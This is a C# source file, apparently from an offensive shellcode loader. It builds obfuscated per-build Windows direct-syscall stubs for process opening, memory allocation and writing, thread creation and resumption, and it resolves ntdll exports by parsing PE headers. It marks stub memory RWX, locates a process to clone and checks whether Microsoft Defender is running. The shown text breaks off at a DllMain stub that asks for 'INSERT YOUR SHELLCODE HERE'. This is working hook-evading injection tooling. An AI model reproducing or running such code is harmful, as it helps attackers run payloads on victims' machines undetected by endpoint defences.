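        public delegate NTSTATUS ZwAllocateVirtualMemoryX(IntPtr ProcessHandle, ref IntPtr BaseAddress, IntPtr ZeroBits, ref IntPtr RegionSize, UInt32 AllocationType, UInt32 Protect);

        /// <summary>Stub-based ZwAllocateVirtualMemory (sysType 4).</summary>
        /// <remarks>
        /// NOTE(review): as in <see cref="ZwMapViewOfSection"/>, the protect call for the
        /// local stub is given the caller's ProcessHandle instead of new IntPtr(-1) — confirm.
        /// </remarks>
        public static NTSTATUS ZwAllocateVirtualMemory(IntPtr ProcessHandle, ref IntPtr BaseAddress, IntPtr ZeroBits, ref IntPtr RegionSize, UInt32 AllocationType, UInt32 Protect, ref OSVERSIONINFOEXW osVersionInfo)
        {
            byte[] syscall = GetOSVersionAndReturnSyscall(4, ref osVersionInfo);
            unsafe
            {
                fixed (byte* ptr = syscall)
                {
                    IntPtr allocMemAddress = (IntPtr)ptr;
                    IntPtr allocMemAddressCopy = (IntPtr)ptr;
                    UInt32 size = (uint)syscall.Length;
                    IntPtr sizeIntPtr = (IntPtr)size;
                    UInt32 oldprotect = 0;
                    ZwProtectVirtualMemory(ProcessHandle, ref allocMemAddress, ref sizeIntPtr, (UInt32)Zeta(), ref oldprotect, ref osVersionInfo);
                    ZwAllocateVirtualMemoryX ZwAllocateVirtualMemoryFunc = (ZwAllocateVirtualMemoryX)Marshal.GetDelegateForFunctionPointer(allocMemAddressCopy, typeof(ZwAllocateVirtualMemoryX));
                    return (NTSTATUS)ZwAllocateVirtualMemoryFunc(ProcessHandle, ref BaseAddress, ZeroBits, ref RegionSize, AllocationType, Protect);
                }
            }
        }

        [SuppressUnmanagedCodeSecurity]
        [UnmanagedFunctionPointer(CallingConvention.Cdecl)]
        public delegate NTSTATUS ZwOpenProcessTokenX(IntPtr ProcessHandle, int DesiredAccess, ref IntPtr TokenHandle);

        /// <summary>Stub-based ZwOpenProcessToken.</summary>
        /// <remarks>
        /// NOTE(review): this wrapper requests sysType 16, which the stub table labels
        /// ZwProtectVirtualMemory; the table's ZwOpenProcessToken entry is sysType 14.
        /// Left as found — confirm which is intended before relying on this wrapper.
        /// </remarks>
        public static NTSTATUS ZwOpenProcessToken(IntPtr ProcessHandle, int DesiredAccess, ref IntPtr TokenHandle, ref OSVERSIONINFOEXW osVersionInfo)
        {
            byte[] syscall = GetOSVersionAndReturnSyscall(16, ref osVersionInfo);
            unsafe
            {
                fixed (byte* ptr = syscall)
                {
                    IntPtr allocMemAddress = (IntPtr)ptr;
                    IntPtr allocMemAddressCopy = (IntPtr)ptr;
                    uint size = (uint)syscall.Length;
                    IntPtr sizeIntPtr = (IntPtr)size;
                    UInt32 oldprotect = 0;
                    Protector(new IntPtr(-1), ref allocMemAddress, ref sizeIntPtr, (UInt32)Zeta(), ref oldprotect);
                    ZwOpenProcessTokenX ZwOpenProcessTokenFunc = (ZwOpenProcessTokenX)Marshal.GetDelegateForFunctionPointer(allocMemAddressCopy, typeof(ZwOpenProcessTokenX));
                    return (NTSTATUS)ZwOpenProcessTokenFunc(ProcessHandle, DesiredAccess, ref TokenHandle);
                }
            }
        }

        [SuppressUnmanagedCodeSecurity]
        [UnmanagedFunctionPointer(CallingConvention.Cdecl)]
        public delegate NTSTATUS ZwWriteVirtualMemoryX(IntPtr ProcessHandle, IntPtr BaseAddress, IntPtr lpBuffer, uint nSize, ref IntPtr lpNumberOfBytesWritten);

        /// <summary>
        /// Stub-based ZwWriteVirtualMemory (sysType 3). BaseAddress is taken by ref only to
        /// match the other wrappers; the delegate receives it by value.
        /// </summary>
        /// <remarks>
        /// NOTE(review): the protect call for the local stub uses ProcessHandle rather than
        /// new IntPtr(-1) like the sibling wrappers — confirm.
        /// </remarks>
        public static NTSTATUS ZwWriteVirtualMemory(IntPtr ProcessHandle, ref IntPtr BaseAddress, IntPtr lpBuffer, uint nSize, ref IntPtr lpNumberOfBytesWritten, ref OSVERSIONINFOEXW osVersionInfo)
        {
            byte[] syscall = GetOSVersionAndReturnSyscall(3, ref osVersionInfo);
            unsafe
            {
                fixed (byte* ptr = syscall)
                {
                    IntPtr allocMemAddress = (IntPtr)ptr;
                    IntPtr allocMemAddressCopy = (IntPtr)ptr;
                    UInt32 size = (uint)syscall.Length;
                    IntPtr sizeIntPtr = (IntPtr)size;
                    UInt32 oldprotect = 0;
                    ZwProtectVirtualMemory(ProcessHandle, ref allocMemAddress, ref sizeIntPtr, (UInt32)Zeta(), ref oldprotect, ref osVersionInfo);
                    ZwWriteVirtualMemoryX ZwWriteVirtualMemoryFunc = (ZwWriteVirtualMemoryX)Marshal.GetDelegateForFunctionPointer(allocMemAddressCopy, typeof(ZwWriteVirtualMemoryX));
                    return (NTSTATUS)ZwWriteVirtualMemoryFunc(ProcessHandle, BaseAddress, lpBuffer, nSize, ref lpNumberOfBytesWritten);
                }
            }
        }

        [SuppressUnmanagedCodeSecurity]
        [UnmanagedFunctionPointer(CallingConvention.Cdecl)]
        public delegate NTSTATUS ZwResumeThreadX(IntPtr ProcessHandle, out ulong SuspendCount);

        /// <summary>
        /// Stub-based ZwResumeThread (sysType 9). The first parameter is a thread handle
        /// despite its name.
        /// </summary>
        /// <remarks>
        /// NOTE(review): the protect call for the local stub is handed that thread handle
        /// instead of new IntPtr(-1) — confirm.
        /// </remarks>
        public static NTSTATUS ZwResumeThread(IntPtr ProcessHandle, out ulong SuspendCount, ref OSVERSIONINFOEXW osVersionInfo)
        {
            byte[] syscall = GetOSVersionAndReturnSyscall(9, ref osVersionInfo);
            unsafe
            {
                fixed (byte* ptr = syscall)
                {
                    IntPtr allocMemAddress = (IntPtr)ptr;
                    IntPtr allocMemAddressCopy = (IntPtr)ptr;
                    UInt32 size = (uint)syscall.Length;
                    IntPtr sizeIntPtr = (IntPtr)size;
                    UInt32 oldprotect = 0;
                    ZwProtectVirtualMemory(ProcessHandle, ref allocMemAddress, ref sizeIntPtr, (UInt32)Zeta(), ref oldprotect, ref osVersionInfo);
                    ZwResumeThreadX ZwResumeThreadFunc = (ZwResumeThreadX)Marshal.GetDelegateForFunctionPointer(allocMemAddressCopy, typeof(ZwResumeThreadX));
                    return (NTSTATUS)ZwResumeThreadFunc(ProcessHandle, out SuspendCount);
                }
            }
        }

        [SuppressUnmanagedCodeSecurity]
        [UnmanagedFunctionPointer(CallingConvention.Cdecl)]
        public delegate NTSTATUS ZwWaitForSingleObjectX(IntPtr Object, bool Alertable, uint Timeout);

        /// <summary>Stub-based ZwWaitForSingleObject (sysType 10).</summary>
        /// <remarks>
        /// NOTE(review): Timeout is passed as a plain uint; if the native parameter is a
        /// pointer to a LARGE_INTEGER, only 0 (no timeout) is safe here — confirm.
        /// </remarks>
        public static NTSTATUS ZwWaitForSingleObject(IntPtr Object, bool Alertable, uint Timeout, ref OSVERSIONINFOEXW osVersionInfo)
        {
            byte[] syscall = GetOSVersionAndReturnSyscall(10, ref osVersionInfo);
            unsafe
            {
                fixed (byte* ptr = syscall)
                {
                    IntPtr allocMemAddress = (IntPtr)ptr;
                    IntPtr allocMemAddressCopy = (IntPtr)ptr;
                    uint size = (uint)syscall.Length;
                    IntPtr sizeIntPtr = (IntPtr)size;
                    UInt32 oldprotect = 0;
                    Protector(new IntPtr(-1), ref allocMemAddress, ref sizeIntPtr, (UInt32)Zeta(), ref oldprotect);
                    ZwWaitForSingleObjectX ZwWaitForSingleObjectFunc = (ZwWaitForSingleObjectX)Marshal.GetDelegateForFunctionPointer(allocMemAddressCopy, typeof(ZwWaitForSingleObjectX));
                    return (NTSTATUS)ZwWaitForSingleObjectFunc(Object, Alertable, Timeout);
                }
            }
        }

        [SuppressUnmanagedCodeSecurity]
        [UnmanagedFunctionPointer(CallingConvention.Cdecl)]
        public delegate NTSTATUS RtlGetVersionX(ref OSVERSIONINFOEXW versionInfo);

        /// <summary>
        /// Calls ntdll!RtlGetVersion via its export address. DllMain uses the build number it
        /// fills in to select the stub table.
        /// </summary>
        public static NTSTATUS RtlGetVersion(ref OSVERSIONINFOEXW versionInfo)
        {
            IntPtr proc = GetLibraryAddress(@"C:\Windows\System32\ntdll.dll", "RtlGetVersion", false);
            RtlGetVersionX RtlGetVersionFunc = (RtlGetVersionX)Marshal.GetDelegateForFunctionPointer(proc, typeof(RtlGetVersionX));
            return (NTSTATUS)RtlGetVersionFunc(ref versionInfo);
        }

        /// <summary>
        /// Page-protection value applied to the stub pages by every wrapper above.
        /// </summary>
        /// <remarks>
        /// The previous implementation spun on <see cref="Random"/> until it drew 32 twice and
        /// returned the sum, i.e. always 64 (0x40) after an unbounded number of draws. The
        /// constant is returned directly; it is the same value <c>ReturnRight()</c> yields,
        /// which DllMain comments as RWX.
        /// </remarks>
        public static int Zeta()
        {
            return 0x40;
        }

        /// <summary>
        /// Walks the export directory of an in-memory PE image and returns the address of the
        /// named export (case-insensitive), or <see cref="IntPtr.Zero"/> when the module
        /// pointer is zero, the image has no export directory, or the name is not present.
        /// </summary>
        /// <param name="ModuleBase">Base address of a loaded image (e.g. from <see cref="GetLoadedModuleAddress"/>).</param>
        /// <param name="ExportName">Export name to look up.</param>
        /// <remarks>
        /// Fixes over the earlier version: a zero ModuleBase no longer dereferences address
        /// 0x3C; the ordinal is read as an unsigned 16-bit value (a signed read goes negative
        /// above 0x7FFF); the ordinal is bounds-checked against NumberOfFunctions.
        /// Forwarded exports are not resolved (same as before).
        /// </remarks>
        public static IntPtr GetExportAddress(IntPtr ModuleBase, string ExportName)
        {
            if (ModuleBase == IntPtr.Zero || string.IsNullOrEmpty(ExportName))
            {
                return IntPtr.Zero;
            }

            long imageBase = ModuleBase.ToInt64();
            Int32 peHeader = Marshal.ReadInt32((IntPtr)(imageBase + 0x3C));
            long optHeader = imageBase + peHeader + 0x18;
            Int16 magic = Marshal.ReadInt16((IntPtr)optHeader);
            // PE32 (0x10b) keeps the data directories at +0x60; PE32+ at +0x70.
            long exportDirEntry = (magic == 0x010b) ? optHeader + 0x60 : optHeader + 0x70;
            Int32 exportRva = Marshal.ReadInt32((IntPtr)exportDirEntry);
            if (exportRva == 0)
            {
                return IntPtr.Zero;
            }

            long exportDir = imageBase + exportRva;
            Int32 numberOfFunctions = Marshal.ReadInt32((IntPtr)(exportDir + 0x14));
            Int32 numberOfNames = Marshal.ReadInt32((IntPtr)(exportDir + 0x18));
            Int32 functionsRva = Marshal.ReadInt32((IntPtr)(exportDir + 0x1C));
            Int32 namesRva = Marshal.ReadInt32((IntPtr)(exportDir + 0x20));
            Int32 ordinalsRva = Marshal.ReadInt32((IntPtr)(exportDir + 0x24));

            for (int i = 0; i < numberOfNames; i++)
            {
                Int32 nameRva = Marshal.ReadInt32((IntPtr)(imageBase + namesRva + i * 4));
                string functionName = Marshal.PtrToStringAnsi((IntPtr)(imageBase + nameRva));
                if (!ExportName.Equals(functionName, StringComparison.OrdinalIgnoreCase))
                {
                    continue;
                }
                // The ordinal table holds unbiased indices into the address table, so no
                // OrdinalBase arithmetic is needed here.
                int functionIndex = (ushort)Marshal.ReadInt16((IntPtr)(imageBase + ordinalsRva + i * 2));
                if (functionIndex >= numberOfFunctions)
                {
                    return IntPtr.Zero;
                }
                Int32 functionRva = Marshal.ReadInt32((IntPtr)(imageBase + functionsRva + 4 * functionIndex));
                return (IntPtr)(imageBase + functionRva);
            }
            return IntPtr.Zero;
        }

        /// <summary>
        /// Resolves an export of a module that is already loaded in this process.
        /// </summary>
        /// <param name="DLLName">Module file name or full path; matched as a suffix of the loaded module's path.</param>
        /// <param name="FunctionName">Export to resolve.</param>
        /// <param name="CanLoadFromDisk">Accepted for call-site compatibility but never acted on: a module that is not loaded resolves to <see cref="IntPtr.Zero"/>.</param>
        /// <returns>The export address, or <see cref="IntPtr.Zero"/> if the module or export is not found.</returns>
        public static IntPtr GetLibraryAddress(string DLLName, string FunctionName, bool CanLoadFromDisk = false)
        {
            IntPtr hModule = GetLoadedModuleAddress(DLLName);
            if (hModule == IntPtr.Zero)
            {
                return IntPtr.Zero;
            }
            return GetExportAddress(hModule, FunctionName);
        }

        /// <summary>
        /// Returns the base address of the first module of the current process whose file
        /// name ends with <paramref name="DLLName"/> (ordinal, case-insensitive), or
        /// <see cref="IntPtr.Zero"/> if none matches or the name is empty.
        /// </summary>
        /// <remarks>
        /// Replaces the earlier ToLower()/EndsWith pair, which was culture-sensitive, and
        /// disposes the <see cref="Process"/> object it enumerates.
        /// </remarks>
        public static IntPtr GetLoadedModuleAddress(string DLLName)
        {
            if (string.IsNullOrEmpty(DLLName))
            {
                return IntPtr.Zero;
            }
            using (Process self = Process.GetCurrentProcess())
            {
                foreach (ProcessModule module in self.Modules)
                {
                    string fileName = module.FileName;
                    if (fileName != null && fileName.EndsWith(DLLName, StringComparison.OrdinalIgnoreCase))
                    {
                        return module.BaseAddress;
                    }
                }
            }
            return IntPtr.Zero;
        }

        /// <summary>
        /// Builds the 11-byte stub the wrappers above execute for one system service on one
        /// Windows 10 build.
        /// </summary>
        /// <param name="sysType">Index into the per-build table (1 = ZwOpenProcess ... see the comments on each branch).</param>
        /// <param name="osVersionInfo">Filled in by <see cref="RtlGetVersion"/>; dwPlatformId and dwBuildNumber select the table.</param>
        /// <remarks>
        /// The array is stored with every byte pre-incremented. A matching branch writes the
        /// build-specific service number into byte 4 (or bytes 4..7 via BlockCopy) and then
        /// decrements all eleven bytes. A (build, sysType) pair with no branch leaves the
        /// placeholder bytes untouched.
        /// NOTE(review): sysType 14 is labelled ZwOpenProcessToken here, while the
        /// ZwOpenProcessToken wrapper asks for 16; sysType 20 (2004 only) is labelled
        /// RtlCreateUserThread, which this file calls through its export instead, and no
        /// wrapper requests it.
        /// </remarks>
        public static byte[] GetOSVersionAndReturnSyscall(byte sysType, ref OSVERSIONINFOEXW osVersionInfo)
        {
            var syscall = new byte[] { 074, 138, 203, 185, 001, 001, 001, 001, 016, 006, 196 };
            // Client OS Windows 10 build 1803, 1809, 1903, 1909, 2004
            if ((osVersionInfo.dwPlatformId == 2) & (osVersionInfo.dwBuildNumber == 19041)) // 2004
            {
                // ZwOpenProcess
                if (sysType == 1) { syscall[4] = 039; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; }} else
                // ZwCreateThreadEx
                if (sysType == 2) { syscall[4] = 194; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; }} else
                // ZwWriteVirtualMemory
                if (sysType == 3) { syscall[4] = 059; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; }} else
                // ZwAllocateVirtualMemory
                if (sysType == 4) { syscall[4] = 025; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; }} else
                // ZwCreateSection
                if (sysType == 5) { syscall[4] = 075; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; }} else
                // ZwMapViewOfSection
                if (sysType == 6) { syscall[4] = 041; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; }} else
                // ZwCreateProcess
                if (sysType == 7) { syscall[4] = 186;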
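for (byte i = 0; i <= 10; i++) { syscall[ i ]--; }} else
                // ZwOpenThread
                if (sysType == 8) { for (byte i = 0; i <= 10; i++) { syscall[ i ]--; } var syscallIdentifierBytes = BitConverter.GetBytes(0x12E); Buffer.BlockCopy(syscallIdentifierBytes, 0, syscall, 4, sizeof(uint)); } else
                // ZwResumeThread
                if (sysType == 9) { syscall[4] = 083; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; }} else
                // ZwWaitForSingleObject
                if (sysType == 10) { syscall[4] = 005; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; }} else
                // ZwSetContextThread
                if (sysType == 11) { for (byte i = 0; i <= 10; i++) { syscall[ i ]--; } var syscallIdentifierBytes = BitConverter.GetBytes(0x18B); Buffer.BlockCopy(syscallIdentifierBytes, 0, syscall, 4, sizeof(uint)); } else
                // ZwGetContextThread
                if (sysType == 12) { syscall[4] = 243; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; }} else
                // ZwClose
                if (sysType == 13) { syscall[4] = 016; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; }} else
                // ZwOpenProcessToken
                if (sysType == 14) { syscall[4] = 0; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; } var syscallIdentifierBytes = BitConverter.GetBytes(0x128); Buffer.BlockCopy(syscallIdentifierBytes, 0, syscall, 4, sizeof(uint)); } else
                // ZwSuspendThread
                if (sysType == 15) { syscall[4] = 0; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; } var syscallIdentifierBytes = BitConverter.GetBytes(0x1BC); Buffer.BlockCopy(syscallIdentifierBytes, 0, syscall, 4, sizeof(uint)); } else
                // ZwProtectVirtualMemory
                if (sysType == 16) { syscall[4] = 81; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; }} else
                // ZwCreateProcessEx
                if (sysType == 17) { syscall[4] = 78; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; }} else
                // NtCreateSection
                if (sysType == 18) { syscall[4] = 75; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; }} else
                // NtMapViewOfSection
                if (sysType == 19) { syscall[4] = 41; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; }} else
                // RtlCreateUserThread (no wrapper in this file requests sysType 20)
                if (sysType == 20) { syscall[4] = 1; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; } var syscallIdentifierBytes = BitConverter.GetBytes(0x128); Buffer.BlockCopy(syscallIdentifierBytes, 0, syscall, 4, sizeof(uint)); }
            } else

            if ((osVersionInfo.dwPlatformId == 2) & (osVersionInfo.dwBuildNumber == 18362 || osVersionInfo.dwBuildNumber == 18363)) // 1903 1909
            {
                // NtOpenProcess
                if (sysType == 1) { syscall[4] = 039; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; }} else
                // NtCreateThreadEx
                if (sysType == 2) { syscall[4] = 190; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; }} else
                // ZwWriteVirtualMemory
                if (sysType == 3) { syscall[4] = 059; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; }} else
                // NtAllocateVirtualMemory
                if (sysType == 4) { syscall[4] = 025; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; }} else
                // ZwCreateSection
                if (sysType == 5) { syscall[4] = 075; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; }} else
                // ZwMapViewOfSection
                if (sysType == 6) { syscall[4] = 041; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; }} else
                // ZwCreateProcess
                if (sysType == 7) { syscall[4] = 182; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; }} else
                // ZwOpenThread
                if (sysType == 8) { for (byte i = 0; i <= 10; i++) { syscall[ i ]--; } var syscallIdentifierBytes = BitConverter.GetBytes(0x129); Buffer.BlockCopy(syscallIdentifierBytes, 0, syscall, 4, sizeof(uint)); } else
                // ZwResumeThread
                if (sysType == 9) { syscall[4] = 083; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; }} else
                // ZwWaitForSingleObject
                if (sysType == 10) { syscall[4] = 005; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; }} else
                // ZwSetContextThread
                if (sysType == 11) { for (byte i = 0; i <= 10; i++) { syscall[ i ]--; } var syscallIdentifierBytes = BitConverter.GetBytes(0x185); Buffer.BlockCopy(syscallIdentifierBytes, 0, syscall, 4, sizeof(uint)); } else
                // ZwGetContextThread
                if (sysType == 12) { syscall[4] = 238; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; }} else
                // ZwClose
                if (sysType == 13) { syscall[4] = 016; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; }} else
                // ZwOpenProcessToken
                if (sysType == 14) { syscall[4] = 0; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; } var syscallIdentifierBytes = BitConverter.GetBytes(0x123); Buffer.BlockCopy(syscallIdentifierBytes, 0, syscall, 4, sizeof(uint)); } else
                // ZwSuspendThread
                if (sysType == 15) { syscall[4] = 0; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; } var syscallIdentifierBytes = BitConverter.GetBytes(0x1B6); Buffer.BlockCopy(syscallIdentifierBytes, 0, syscall, 4, sizeof(uint)); } else
                // ZwProtectVirtualMemory
                if (sysType == 16) { syscall[4] = 81; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; }} else
                // ZwCreateProcessEx
                if (sysType == 17) { syscall[4] = 78; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; }} else
                // NtCreateSection
                if (sysType == 18) { syscall[4] = 75; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; }} else
                // NtMapViewOfSection
                if (sysType == 19) { syscall[4] = 41; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; }}
            } else

            if ((osVersionInfo.dwPlatformId == 2) & (osVersionInfo.dwBuildNumber == 17134)) // 1803
            {
                // ZwOpenProcess
                if (sysType == 1) { syscall[4] = 039; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; }} else
                // ZwCreateThreadEx
                if (sysType == 2) { syscall[4] = 188; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; }} else
                // ZwWriteVirtualMemory
                if (sysType == 3) { syscall[4] = 059; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; }} else
                // ZwAllocateVirtualMemory
                if (sysType == 4) { syscall[4] = 025; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; }} else
                // ZwCreateSection
                if (sysType == 5) { syscall[4] = 075; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; }} else
                // ZwMapViewOfSection
                if (sysType == 6) { syscall[4] = 041; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; }} else
                // ZwCreateProcess
                if (sysType == 7) { syscall[4] = 181; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; }} else
                // ZwOpenThread
                if (sysType == 8) { for (byte i = 0; i <= 10; i++) { syscall[ i ]--; } var syscallIdentifierBytes = BitConverter.GetBytes(0x129); Buffer.BlockCopy(syscallIdentifierBytes, 0, syscall, 4, sizeof(uint)); } else
                // ZwResumeThread
                if (sysType == 9) { syscall[4] = 083; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; }} else
                // ZwWaitForSingleObject
                if (sysType == 10) { syscall[4] = 005; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; }} else
                // ZwSetContextThread
                if (sysType == 11) { for (byte i = 0; i <= 10; i++) { syscall[ i ]--; } var syscallIdentifierBytes = BitConverter.GetBytes(0x185); Buffer.BlockCopy(syscallIdentifierBytes, 0, syscall, 4, sizeof(uint)); } else
                // ZwGetContextThread
                if (sysType == 12) { syscall[4] = 238; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; }} else
                // ZwClose
                if (sysType == 13) { syscall[4] = 016; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; }} else
                // ZwOpenProcessToken
                if (sysType == 14) { syscall[4] = 0; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; } var syscallIdentifierBytes = BitConverter.GetBytes(0x121); Buffer.BlockCopy(syscallIdentifierBytes, 0, syscall, 4, sizeof(uint)); } else
                // ZwSuspendThread
                if (sysType == 15) { syscall[4] = 0; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; } var syscallIdentifierBytes = BitConverter.GetBytes(0x1B6); Buffer.BlockCopy(syscallIdentifierBytes, 0, syscall, 4, sizeof(uint)); } else
                // ZwProtectVirtualMemory
                if (sysType == 16) { syscall[4] = 81; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; }} else
                // ZwCreateProcessEx
                if (sysType == 17) { syscall[4] = 78; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; }} else
                // NtCreateSection
                if (sysType == 18) { syscall[4] = 75; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; }} else
                // NtMapViewOfSection
                if (sysType == 19) { syscall[4] = 41; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; }}
            } else

            if ((osVersionInfo.dwPlatformId == 2) & (osVersionInfo.dwBuildNumber == 17763)) // 1809
            {
                // ZwOpenProcess
                if (sysType == 1) { syscall[4] = 039; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; }} else
                // ZwCreateThreadEx
                if (sysType == 2) { syscall[4] = 189; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; }} else
                // ZwWriteVirtualMemory
                if (sysType == 3) { syscall[4] = 059; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; }} else
                // ZwAllocateVirtualMemory
                if (sysType == 4) { syscall[4] = 025; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; }} else
                // ZwCreateSection
                if (sysType == 5) { syscall[4] = 075; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; }} else
                // ZwMapViewOfSection
                if (sysType == 6) { syscall[4] = 041; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; }} else
                // ZwCreateProcess
                if (sysType == 7) { syscall[4] = 181; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; }} else
                // ZwOpenThread
                if (sysType == 8) { for (byte i = 0; i <= 10; i++) { syscall[ i ]--; } var syscallIdentifierBytes = BitConverter.GetBytes(0x129); Buffer.BlockCopy(syscallIdentifierBytes, 0, syscall, 4, sizeof(uint)); } else
                // ZwResumeThread
                if (sysType == 9) { syscall[4] = 083; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; }} else
                // ZwWaitForSingleObject
                if (sysType == 10) { syscall[4] = 005; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; }} else
                // ZwSetContextThread
                if (sysType == 11) { for (byte i = 0; i <= 10; i++) { syscall[ i ]--; } var syscallIdentifierBytes = BitConverter.GetBytes(0x184); Buffer.BlockCopy(syscallIdentifierBytes, 0, syscall, 4, sizeof(uint)); } else
                // ZwGetContextThread
                if (sysType == 12) { syscall[4] = 237; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; }} else
                // ZwClose
                if (sysType == 13) { syscall[4] = 016; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; }} else
                // ZwOpenProcessToken
                if (sysType == 14) { syscall[4] = 0; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; } var syscallIdentifierBytes = BitConverter.GetBytes(0x122); Buffer.BlockCopy(syscallIdentifierBytes, 0, syscall, 4, sizeof(uint)); } else
                // ZwSuspendThread
                if (sysType == 15) { syscall[4] = 0; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; } var syscallIdentifierBytes = BitConverter.GetBytes(0x1B5); Buffer.BlockCopy(syscallIdentifierBytes, 0, syscall, 4, sizeof(uint)); } else
                // ZwProtectVirtualMemory
                if (sysType == 16) { syscall[4] = 81; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; }} else
                // ZwCreateProcessEx
                if (sysType == 17) { syscall[4] = 78; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; }} else
                // NtCreateSection
                if (sysType == 18) { syscall[4] = 75; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; }} else
                // NtMapViewOfSection
                if (sysType == 19) { syscall[4] = 41; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; }}
            } // 1809

            // Every branch above decrements byte 0 from its stored value 074 to 073. If it is
            // still 074 no branch ran (unknown build, or a sysType this build has no entry
            // for) and the array still holds the undecoded placeholder bytes. Returning them
            // would hand the caller something it pins and executes; fail loudly instead.
            if (syscall[0] != 073)
            {
                throw new PlatformNotSupportedException(
                    "No syscall stub for sysType " + sysType + " on build " + osVersionInfo.dwBuildNumber);
            }

            return syscall;
        }

        /// <summary>
        /// Returns the PID of the last Win32_Process instance whose Name equals
        /// <paramref name="processName"/> (ordinal comparison), or 0 if there is none.
        /// Despite the name it does not distinguish a clone from any other process with the
        /// same image name; DllMain calls it before cloning to locate the source process.
        /// </summary>
        /// <remarks>
        /// Last match wins, as before. WMI objects are now disposed, and a null Name no
        /// longer throws.
        /// </remarks>
        public static int FindClonedProcess(string processName)
        {
            int result = 0;
            using (ManagementClass processClass = new ManagementClass("Win32_Process"))
            using (ManagementObjectCollection instances = processClass.GetInstances())
            {
                foreach (ManagementObject instance in instances)
                {
                    using (instance)
                    {
                        string name = instance["Name"] as string;
                        if (name != null && string.Equals(name, processName, StringComparison.Ordinal))
                        {
                            result = Convert.ToInt32(instance["ProcessId"]);
                        }
                    }
                }
            }
            return result;
        }

        /// <summary>
        /// Returns 0x1FFFFF. Not referenced by the visible code; presumably an access mask
        /// (compare it with ProcessAccessFlags.All before use — TODO confirm).
        /// </summary>
        /// <remarks>
        /// The previous implementation spun on <see cref="Random"/> until it drew 100 and
        /// then 51 and returned 100 + 51 + 2097000, i.e. always 2097151; the constant is
        /// returned directly.
        /// </remarks>
        public static int ReturnUpper()
        {
            return 0x1FFFFF;
        }

        /// <summary>
        /// Returns 0x40, the protection DllMain applies to the injected region (its call site
        /// is commented "Change allocated memory to RWX").
        /// </summary>
        /// <remarks>
        /// The previous implementation spun on <see cref="Random"/> until it drew 60 and then
        /// 4 and returned their sum, i.e. always 64; the constant is returned directly.
        /// </remarks>
        public static int ReturnRight()
        {
            return 0x40;
        }

        /// <summary>
        /// True if a Win32_Process instance named "MsMpEng.exe" exists, false otherwise.
        /// </summary>
        /// <remarks>
        /// The previous version also read CommandLine and tested <c>Contains("")</c> twice,
        /// which is always true, so the effective check was name presence only; that dead
        /// test is dropped, WMI objects are disposed, and a null Name no longer throws.
        /// </remarks>
        public static bool IsDefenderRunning()
        {
            using (ManagementClass processClass = new ManagementClass("Win32_Process"))
            using (ManagementObjectCollection instances = processClass.GetInstances())
            {
                foreach (ManagementObject instance in instances)
                {
                    using (instance)
                    {
                        string name = instance["Name"] as string;
                        if (name != null && string.Equals(name, "MsMpEng.exe", StringComparison.Ordinal))
                        {
                            return true;
                        }
                    }
                }
            }
            return false;
        }

        public static void DllMain() // dll entrypoint
        {
            byte[] scode = new byte[ SHELLCODE LENGTH HERE] { INSERT YOUR SHELLCODE HERE };

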